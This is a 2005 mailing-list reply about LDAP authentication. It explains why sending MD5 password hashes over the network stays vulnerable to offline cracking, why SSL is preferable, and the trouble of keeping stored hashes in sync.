[ale] How LDAP works with authentication

Jason Day jasonday at worldnet.att.net
Wed Oct 12 16:23:31 EDT 2005


On Wed, Oct 12, 2005 at 03:22:15PM -0400, Christopher Fowler wrote:
> Thats is a hell of a lot better then sending the plaintext password to
> LDAP.  I would want the LDAP server to send me an MD5 encrypted
> password.

Sure it's better, but it's still not safe.  If someone is sniffing your
network they can collect the password hashes and then do dictionary
and/or brute force attacks offline.  If someone is using a weak password
it's only marginally better than sending in the clear.  SSL would be
much better, but of course on an embedded device you probably don't have
the option to just install OpenSSL.

I think, and I'm not sure about this, that most LDAP servers do _not_
return the password hash along with the other user data.  I think that
the fact that Domino does do this is considered a security risk.
Assuming this is the case, you will need to add a password hash record
to every user object in order to return it.  Which, of course, will mean
you have to worry about keeping them in sync whenever a user changes
his/her password.

Jason
-- 
Jason Day                                       jasonday at
http://jasonday.home.att.net                    worldnet dot att dot net
 
"Of course I'm paranoid, everyone is trying to kill me."
    -- Weyoun-6, Star Trek: Deep Space 9



More information about the Ale mailing list